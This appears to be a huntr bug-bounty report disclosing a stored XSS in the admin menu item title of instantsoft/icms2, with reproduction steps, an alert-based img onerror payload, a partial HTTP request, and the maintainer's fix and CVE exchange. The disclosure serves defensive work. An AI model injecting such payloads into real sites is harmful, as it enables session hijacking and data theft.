We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

Stored XSS in title in instantsoft/icms2

Valid

Reported on

Jul 22nd 2023

Description

There is Stored XSS in the item title of the menu on the administrator screen.

Proof of Concept

Step 1. Log in to the admin screen and select Add New Item in Menu.
Step 2. Specify the following Payload for the item title and save it.
Step 3. Once saved, any script can be executed on the administrator screen.

Payload

<img src=x onerror=alert(document.domain)>

Request

POST /admin/menu/item_add/1/40 HTTP/2
Host: localhost
 ...
-----------------------------270651214445377498288823999
Content-Disposition: form-data; name="title"

<img src=x onerror=alert(document.domain)>
-----------------------------270651214445377498288823999
 ...

PoC Video

https://drive.google.com/file/d/1DjT6hbPBXpIs2pbrZ1EZZluZDOSDjeMk/view?usp=sharing

Impact

Stored XSS vulnerabilities can lead to data theft, account compromise, and the distribution of malware.
Attackers can inject malicious scripts into a website, allowing them to steal sensitive information or hijack user sessions.
Additionally, stored XSS can result in website defacement and content manipulation, causing reputational damage.
It can also be used as a platform for launching phishing attacks, tricking users into revealing their credentials or sensitive data.

We are processing your report and will contact the instantsoft/icms2 team within 24 hours. 2 months ago
morioka12 modified the report
2 months ago
We have contacted a member of the instantsoft/icms2 team and are waiting to hear back 2 months ago
instantsoft/icms2 maintainer
2 months ago

Maintainer

Fixed https://github.com/instantsoft/icms2/commit/1dbc3e6c8fbf5d2dc551cb27fad0de3584dee40f

morioka12
2 months ago

Researcher

@maintainer Thanks for your fix. Can you give me a status update and a CVE request?

instantsoft/icms2 maintainer
2 months ago

Maintainer

@morioka12 Thanks for finding the problem. Status update - committed to the master branch on github. Unfortunately, I don't know what a "CVE request" is.

morioka12
2 months ago

Researcher

@maintainer I believe there is a button to 'mark as fixed' on this report from huntr and also assign a CVE. And please disclose this report as well.

instantsoft/icms2 maintainer modified the Severity from Low (3.8) to Low (3.5) 2 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
instantsoft/icms2 maintainer validated this vulnerability 2 months ago
morioka12 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
instantsoft/icms2 maintainer marked this as fixed in 2.16.1-git with commit 1dbc3e 2 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
instantsoft/icms2 maintainer published this vulnerability 2 months ago
instantsoft/icms2 maintainer
2 months ago

Maintainer

@morioka12 Did I do everything right or is there anything else you need from me?

morioka12
2 months ago

Researcher

@maintainer No problem. Thank you very much!

to join this conversation